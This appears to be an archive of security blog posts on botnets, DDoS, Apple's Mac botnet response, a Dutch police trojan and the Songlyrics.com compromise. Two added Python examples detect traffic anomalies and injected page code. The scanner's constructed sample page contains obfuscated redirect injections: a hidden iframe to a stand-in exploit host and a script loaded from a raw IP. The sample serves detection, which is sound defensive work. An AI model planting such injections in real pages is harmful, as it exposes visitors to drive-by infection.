Trend has done an analysis of #OpIsrael attacks on April 7. It notes that on that particular day, traffic to one particular website, normally around 90% Israeli, became 90% international due to the botnet DDoS attacks.
This increase in non-Israeli traffic was well distributed, with users from 27 countries (beside Israel itself) accessing the target site.
This is factual and we can take it at face value from a company like Trend. The next comments, however, start with fact but end in interpretation:
[fact] Examining the IP addresses that had accessed the target site, we noticed that some of these were known to be parts of various botnets under the control of cybercriminals. In addition, further investigation revealed that these IP addresses had been previously identified as victims of other attacks like FAKEAV, ransomware, and exploit kits.
[opinion] These findings highlight how major DDoS attacks are, at least in part, not just carried out by hacker groups like Anonymous but by cybercriminals as well. These attacks are not nearly as “harmless” as some would think.
The interpretation is that because a particular PC is known to be infected with a bot, participation in the DDoS attack against Israel was necessarily under the direction of the botherder criminal. But an alternative interpretation could be that the PC owner, entirely independently, decided to take part in the protest. (This is unlikely given the need to hide the source IP during such a protest.) Another possibility, however, could be that an activist protester, not otherwise a criminal, could have hired a botnet from a criminal, not otherwise an activist.
My point is that the final comment (“major DDoS attacks are, at least in part, not just carried out by hacker groups like Anonymous but by cybercriminals as well”) is a non-sequitur from the preceding argument. Trend may be right; but it should not be making such a bald statement without further ‘proof’.
It highlights a danger we all face as we shift our news intake from traditional newspapers to blogs: the automatic acceptance of an opinion as fact. Blogs, for their part, should draw a distinction between fact and opinion – and the conclusion of this particular blog should be clearly labelled ‘opinion’.
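For readers who want to see what sits behind the two factual observations above (the home-country share of traffic collapsing while the number of source countries balloons, and source IPs turning up on a list of known bot hosts), here is an added example of both checks run over an access log. It is not Trend's tooling and nothing in it comes from the report: the log format, the country codes standing in for a GeoIP lookup, the RFC 5737 documentation addresses and the “known bot” CIDR feed are all constructed for the demo.

```python
"""Geo-share drift and known-bot overlap checks over a web access log.

Added example, not Trend Micro's code. Log format, country codes, IP ranges and
the KNOWN_BOT_RANGES feed are constructed stand-ins for real data.
"""
import ipaddress
from collections import Counter

HOME_COUNTRY = "IL"


def build_log(day, entries):
    """Construct 'timestamp ip country request' lines from (ip, country, count)."""
    lines = []
    for ip, country, count in entries:
        for i in range(count):
            lines.append(f"{day}T12:{i % 60:02d}:00Z {ip} {country} GET /")
    return "\n".join(lines)


# Constructed baseline day: overwhelmingly home-country traffic, a few foreign hits.
BASELINE_LOG = build_log("2013-04-06", [
    ("192.0.2.10", "IL", 45), ("192.0.2.11", "IL", 40), ("192.0.2.12", "IL", 5),
    ("198.51.100.7", "US", 6), ("198.51.100.8", "DE", 4),
])

# Constructed attack day: the home share collapses and 27 foreign countries appear.
FOREIGN = ["US", "DE", "FR", "BR", "TR", "ID", "IN", "PK", "EG", "RU", "UA", "PL",
           "NL", "GB", "ES", "IT", "AR", "MX", "MY", "TH", "VN", "SA", "MA", "DZ",
           "TN", "BD", "PH"]
ATTACK_LOG = build_log("2013-04-07", [("192.0.2.10", "IL", 10)] +
                       [(f"203.0.113.{i + 1}", c, 4) for i, c in enumerate(FOREIGN)])


def parse_log(text):
    """Return (client_ip, country) pairs; skips lines that do not fit the format."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3:
            records.append((parts[1], parts[2]))
    return records


def traffic_profile(records, home=HOME_COUNTRY):
    """Total requests, share of non-home traffic and count of distinct foreign countries."""
    total = len(records)
    countries = Counter(country for _, country in records)
    foreign = total - countries.get(home, 0)
    return {
        "total": total,
        "foreign_share": foreign / total if total else 0.0,
        "foreign_countries": sum(1 for c in countries if c != home),
    }


def geo_shift_alert(baseline, current, share_jump=0.5, min_countries=20):
    """Flag a day whose foreign share jumped by share_jump AND spread over many countries.

    Both conditions together separate a distributed flood from, say, one foreign
    crawler hammering the site (large share, single country)."""
    b, c = traffic_profile(baseline), traffic_profile(current)
    return (c["foreign_share"] - b["foreign_share"] >= share_jump
            and c["foreign_countries"] >= min_countries)


# Constructed reputation feed: CIDRs previously seen hosting bots.
KNOWN_BOT_RANGES = [ipaddress.ip_network(n) for n in ("203.0.113.0/28", "198.51.100.0/30")]


def known_bot_hits(records):
    """Source IPs from the log that fall inside a known-bot range.

    A hit only says the address was on the list at some point; it says nothing about
    who directed the traffic, which is the point the post above makes."""
    hits = set()
    for ip, _ in records:
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in KNOWN_BOT_RANGES):
            hits.add(ip)
    return sorted(hits, key=ipaddress.ip_address)


if __name__ == "__main__":
    base, attack = parse_log(BASELINE_LOG), parse_log(ATTACK_LOG)
    print("baseline:", traffic_profile(base))
    print("attack day:", traffic_profile(attack))
    print("geo shift alert:", geo_shift_alert(base, attack))
    print("attack-day sources on bot feed:", len(known_bot_hits(attack)))
```

Against real logs the country column would come from a GeoIP lookup and the bot feed from a reputation provider; the thresholds are arbitrary starting points and should be tuned to the site's own baseline.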
Before I say anything else, let me just say that I really, really like Sophos; and I really, really like NakedSecurity; and I really, really like Graham Cluley. This is really, really just a comment on how the internet has upset the status quo rather than a criticism of any of the above.
Purely coincidentally I was talking to a fellow freelancer who, like me, is old enough to remember the golden, halcyon days of freelancing back in the mists of the last century. The internet has destroyed all that, along with the majority of the magazines for which I used to write.
“Today,” I said, “company blogs have replaced independent magazines. Just take NakedSecurity, which competes head on with the security magazines in terms of content.”
I stand by that. It’s a great blog and a great read written by experts in their subject. But the one thing it isn’t is ‘independent’.
Consider one of today’s news items: Microsoft and Symantec jointly took down the Bamital botnet (my news story is on Infosecurity Mag here). The problem is that Symantec, a direct competitor of Sophos, gets hardly a look-in on the Sophos blog – which is headlined: Bamital botnet dismantled, as Microsoft seizes control of malware servers.
In fact, you wouldn’t think that Symantec was involved in the actual takedown at all judging from the Sophos account – despite the fact that it published an excellent and detailed analysis of Bamital today.
Coincidence? Possibly; but I doubt it. The problem is that NakedSecurity is so good and so popular that it is often taken as news. It isn’t. It’s a marketing machine for Sophos – and readers should always bear in mind (not just for NakedSecurity, but for all of the company blogs that are replacing the magazines) that the one thing you cannot get from a company blog is independent news.
Apple, it keeps telling us, is on top of security. Well, I used to give it the benefit of the doubt on that; but now I’m not so sure. What worries me is not the existence of a massive Mac botnet (Windows suffers from far more), nor even Apple’s response to the finder of the botnet, Russian firm Dr Web. “We’ve given them all the data we have,” said Dr Web’s chief executive Boris Sharov. Apple’s reply? Zilch – but that’s just arrogance, not really anything to worry about, just something we have to accommodate.
It’s the one thing that Apple actually did do that worries me.
The botnet was discovered by Russian firm Dr Web. Not exactly a big name in security, but a good one nevertheless. The company set up three sinkhole servers to help monitor the botnet, estimate its size – and perhaps take it down. Apple’s one actual response? It contacted Russian Web registrar Reggi.ru and asked for one of the servers to be shut down since it was engaged in malicious activity. It wasn’t – it was one of Dr Web’s sinkholes.
Dr Web’s CEO, Boris Sharov, thinks this was an honest mistake by Apple. I suspect it was a dishonest mistake. I suspect it was more to do with Apple attempting to maintain its carefully constructed facade of invulnerability. I suspect that if it had been one of the better known anti-malware companies that had discovered this 600,000 strong Mac botnet Apple would have reacted differently. Instead they thought they could keep quiet, try to shut down the botnet by taking down a C&C server and nobody would be any the wiser.
Instead the company has simply shown itself to be a child in an adult’s playground. Poor show, Apple.
My news stories on Infosecurity Magazine for Wednesday 21 March…
Two new botnets discovered by ESET and Kaspersky Lab
Kaspersky’s discovery is centered in Russia; ESET’s discovery is centered in Georgia. Both shed new light on the ingenuity and intention of cybercriminals.
21 March 2012
Russian wins Facebook Hacker Cup Again
Eight thousand initial entrants to Facebook’s second annual Hacker Cup from 150 countries were reduced to just 25 finalists from Russia, Germany, Poland, Ukraine, China, South Korea, Japan, Taiwan, and the United States.
21 March 2012
Indian company hacks GSM and usurps IMSI
At a security conference organized by Null in India, Matrix Shell claimed and demonstrated the ability to hack into GSM phones and manipulate the user’s International Mobile Subscriber Identity.
21 March 2012
My news stories on Infosecurity Magazine yesterday:
2012 : Expect DDoS botnets to be smaller, more effective and more of them!
A new analysis of DDoS attacks in the second half of 2011 predicts smaller-sized but increased numbers of specialist DDoS botnets.
28 February 2012
M2M presents new security risks that require new security solutions
We are entering a brave new world of machine to machine (M2M) technology. We know it. We have concerns about it. But are we ready for it?
28 February 2012
Gatekeeper – a new security feature or a walled garden for OSX?
Apple’s OSX 10.8 Mountain Lion due this summer will contain a new feature called Gatekeeper. Opinions vary on whether it is a genuine security feature or the cornerstone of a new walled garden.
28 February 2012
Steve Ranger at Silicon.com published an interesting (Chinese interesting, that is) article on Tuesday (6 Dec): Want to stop botnets overnight? Ban infected PCs from the net. The title is unfortunate, because I think even Steve knows that banning (known) infected PCs wouldn’t stop botnets anytime soon, never mind overnight.
The time has come to ignore the howls of protest, the cries of ‘I didn’t know!’ and ‘It wasn’t me!’, and to decide that if a PC is infected with viruses or has become part of a botnet, it should no longer be allowed access to the internet…
ISPs can easily spot if a device is part of a botnet, or is riddled with viruses… [No]
Taking these rogue PCs off the net will save the rest of us time, money and hassle. It sends the message that accessing the web is a privilege to be earned and not a right to be unthinkinhgly [sic] abused… [It is now considered a 'human right']
…I’d wager the spam and botnet problem would disappear overnight if such measures were put in place. [No it wouldn't]
Want to stop botnets overnight? Ban infected PCs from the net.
Oh, where do I begin?
Rather than that, I turned to Kaspersky’s David Emm for an opinion. “On the face of it,” he said, “this seems very reasonable – but it’s not as straightforward as it sounds.
“A few years ago,” he continued, “the House of Lords Science and Technology Committee, in its report ‘Personal Internet Security’, suggested that we ought to review the ‘neutral carrier’ status of ISPs and make them assume some responsibility for what goes through their network. If we were to do so, however, it would not be very easy to enforce. You would have to demonstrate that an ISP knowingly transmitted malware across its network.”
That word ‘knowingly’ has wider ramifications. What do we do with the user who has the latest security, but gets caught by an unknown 0-day virus? Warn him/her? And then it happens again, and once again. Cut him off at the connectors? It’s not the user’s fault – he or she was as well-protected as possible. Is it the security industry’s fault? Hardly.
“And anyway,” continued David, “if we were to introduce such measures, there might be a danger that consumers would wash their hands of the problem and see it as the ISP’s responsibility.” Well, you could make a better case for it being the ‘fault’ of the ISP than the user; so what do we do? Shut down the ISP?
“The truth is,” says David, “that we all have to assume responsibility when we go online.”
Singling out the user is not the way to go.
Over the last couple of days we have been hearing news about the seizure of more than 100 servers by the Dutch police. These servers were involved in the control of a huge number of Bredolab bots; so this can only be seen as a Good Thing.
However, the problem with taking down Command & Control servers is that it leaves the botnet itself in place. It can spring to life again when the criminals set up new C&C servers. So the real solution is to find and cleanse the bots themselves.
Well, the Dutch police attempted to do just this. With help from the Dutch Infosec company Fox-IT and the ISP LeaseWeb, the authorities uploaded their own code – effectively their own trojan – to the infected PCs. The payload is obviously benign. It simply sends the users to a Dutch Police page that explains that they are infected, and provides a link to information on removing the infection. By removing the bots rather than just the servers, the botnet is well and truly dismantled.
Well, I know nothing about Dutch law. But notice that the landing page is in English (there is, of course, also a Dutch version). It is perfectly clear, then, that the Dutch authorities were well aware that they would be ‘infecting’ PCs outside of The Netherlands – and quite likely some in the UK. So, for people in the UK, we are able to look at this from a UK point of view, and not just a Dutch point of view.
And what I want to know is whether the Dutch police action is legal, and/or acceptable. Most people in the security industry will automatically say it is acceptable. After all, it is their job to protect us, and this is a good way of going about it. And the security industry has been ‘infecting’ command and control servers for years – so this is just a small expansion from the servers to the bots. But I’m not so sure it is acceptable – and I’m pretty certain that in the UK it is illegal: that is, the Dutch authorities have broken UK laws if they have infected any UK PCs.
I asked leading lawyer Nicholas Bohm for his view. “Infecting a computer with a trojan would involve offences under the Computer Misuse legislation,” he explained, “unless carried out with some form of lawful authority. In the UK this is available under Part III of the Police Act 1997 (as amended). Authority may be given by chief constables, and others of equivalent rank.
“These powers were primarily introduced to cover the installation of viewing or listening devices in the premises or vehicles of suspects, but they seem to me capable of extending to planting trojans, keystroke loggers etc.”
Yaman Akdeniz, Associate Professor of Law, Faculty of Law, Istanbul Bilgi University, and Director, Cyber-Rights.Org, has similar concerns under the Computer Misuse Act: “Well, there is no ‘good hacker’ or ‘ethical hacker’ defence built into the Computer Misuse Act 1990, nor into the provisions of the Council of Europe CyberCrime Convention for example. So, whatever their intentions are, the access by the Dutch Police into the infected PCs of computer users would be unauthorised in the UK.
“On top of that their ‘modification’ of the content of the infected PCs can also be regarded in breach of the CMA 1990. So, from a legal point of view I find this approach problematic. What if they damage the computers? One may argue that the damage is already done with the initial infection but the access remains unauthorised whether by the bad guys or the good guys.”
So, on balance, the CMA forbids the covert installation of trojans, even if with the best of intentions by the good guys, but could be overridden by ‘chief constables, and others of equivalent rank’ under the Police Act 1997. But Bohm doesn’t believe that the Dutch police behaviour is automatically or necessarily bad. “Some such powers seem to me necessary, just as search warrants are. But I would rather see them controlled judicially – I am unconvinced by the use of retired judges as commissioners to supervise them, and would prefer the decisions involved to be subject to judicial review.”
It seems to me, then, that the Dutch police have broken UK law if they have uploaded their friendly trojan to any UK PCs; and have probably broken other laws all round the world. Judicial oversight may make such behaviour more acceptable; but without it, it should be abhorred. Accepting such behaviour from the authorities, who will always say ‘it is for your own good’ is a dangerous step. Every software developer in the world is aware of the dangers of ‘feature creep’. This sort of behaviour by the authorities is equally subject to feature creep – otherwise known as the slippery slope into authoritarianism.
Be careful out there. Just as Qualys releases its latest report discussing the changing face of today’s threats (and I’ll be discussing that with Wolfgang Kandek in the next post), Websense discovers a perfect example: bad guys are compromising good sites. The Websense Security Labs ThreatSeeker Network has found that Songlyrics.com (which gets approximately 200,000 daily page views) has been compromised with obfuscated malicious code.
When a user loads the main page of the song lyrics site, the injected code runs and silently sends the browser to an exploit site loaded with the Crimepack exploit kit. Only 39.5% of antivirus engines currently recognise this exploit. Any computer exposed and infected just becomes another zombie-bot in the wild; and there’s hardly anything the user can do to prevent this from occurring.
We are seeing the bad guys more frequently compromise popular sites in an effort to infect and exploit the most users, as in this most recent case with songlyrics.com, a site that gets millions of unique visitors. It is unfortunate that in this case, Google Instant results are also helping to steer unaware users to this malicious content. Without real-time content analysis, all users are at risk.
Carl Leonard, Senior Manager, Websense Security Labs
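The post above describes the symptom (obfuscated code injected into a legitimate page that silently hands the browser to an exploit kit) without showing the code, and Websense has not published it here. As an added example, not Websense's or Songlyrics.com's, here is a small scanner for the tell-tale signs such injections usually leave in a page: hidden or zero-size iframes, `document.write(unescape(...))` / `eval(unescape(...))` wrappers, long `%xx` or `\x` escape runs, `String.fromCharCode` chains, and script tags pulling from hosts outside an allow-list. It also decodes the argument of an `unescape(...)` call and rescans the result, which is the one layer of de-obfuscation that catches the hidden-iframe-in-a-string trick. The sample page, the `exploit.invalid` host, the `203.0.113.5` address and the allowed host `static.example.com` are all constructed for the demo.

```python
"""Indicator scan for injected, obfuscated redirect code in an HTML page.

Added example; not Websense code and not the real Songlyrics.com payload. The
SAMPLE_PAGE, hosts and addresses below are constructed for the demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
UNESCAPE_ARG = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1", re.I | re.S)
OBFUSCATION_PATTERNS = {
    "eval-unescape": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "write-unescape": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
    "fromcharcode-chain": re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}", re.I),
    "percent-encoded-run": re.compile(r"(?:%[0-9a-fA-F]{2}){12,}"),
    "hex-escaped-run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){12,}"),
}


def _tiny(value):
    """True for width/height values of 0 or 1 (with or without 'px')."""
    return (value or "").strip().lower().rstrip("px") in ("0", "1")


class InjectionScanner(HTMLParser):
    """Collects (kind, detail, line) findings while parsing a page."""

    def __init__(self, allowed_script_hosts):
        super().__init__()
        self.allowed = set(allowed_script_hosts)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        line = self.getpos()[0]
        if tag == "iframe":
            hidden = _tiny(a.get("width")) or _tiny(a.get("height")) \
                or HIDDEN_STYLE.search(a.get("style") or "")
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src") or "", line))
        elif tag == "script":
            self._in_script = True
            src = a.get("src")
            if src:
                host = urlparse(src).hostname or ""
                if host and host not in self.allowed:
                    self.findings.append(("external-script", src, line))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data unparsed, so this sees raw JS.
        if not self._in_script:
            return
        line = self.getpos()[0]
        for name, pattern in OBFUSCATION_PATTERNS.items():
            if pattern.search(data):
                self.findings.append((name, data.strip()[:60], line))
        # One layer of de-obfuscation: decode unescape('...') arguments and rescan them.
        for m in UNESCAPE_ARG.finditer(data):
            for kind, detail, _ in scan_html(unquote(m.group(2)), self.allowed):
                self.findings.append(("decoded:" + kind, detail, line))


def scan_html(html, allowed_script_hosts=("static.example.com",)):
    """Scan a page and return the list of (kind, detail, line) findings."""
    scanner = InjectionScanner(allowed_script_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: a normal site script, then an injected document.write(unescape())
# that builds a zero-size iframe, a direct hidden iframe, and a script from a raw IP.
SAMPLE_PAGE = """<html><head><title>Lyrics</title>
<script src="https://static.example.com/site.js"></script>
</head><body>
<h1>Song lyrics</h1>
<!-- constructed injected block below: the shape of redirect the post describes -->
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.invalid%2Fin.php%22%20width%3D%220%22%20height%3D%220%22%3E%3C%2Fiframe%3E'));</script>
<iframe src="http://exploit.invalid/in.php" width="0" height="0" style="display:none"></iframe>
<script src="http://203.0.113.5/x.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail, line in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {kind}: {detail}")
```

This is a triage aid, not an antivirus: it flags the cheap indicators that 2010-era injection kits left behind, and a determined attacker can avoid every one of them. Its value is in running it over a crawl of your own pages on a schedule, so a change on the site's home page is noticed before the exploit kit's visitors are.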
Luis Corrons has been giving some more information on the reported Slovenian Mariposa arrests. You may recall that PandaLabs had been instrumental in the Mariposa takedown early this year. This arrest is not for the Spanish Mariposa botherder (Netkairo) but the original Mariposa developer (Iserdo). (See our interview with Luis here.) Now Luis comments:
Back in March, when the story went public, we talked about the Spanish guys arrested, and that they had bought the bot. Probably you realized that we didn’t mention anything about the seller of the bot. This was not because we didn’t know who was behind that, but because the FBI kindly ask us not to disclose that information, as they were chasing Iserdo. Who’s Iserdo? As far as I know, he is a Slovenian guy, the main developer of the butterfly bot and he was in touch with Netkairo, and was who sold the Mariposa bot to Netkairo…
But this is not over. The Guardia Civil is still trying to arrest more people regarding the Mariposa botnet. And Iserdo has been selling the bot to different people, who are creating new botnets (as the one with the “Vodafone Incident“.)
Luis Corrons, technical director, PandaLabs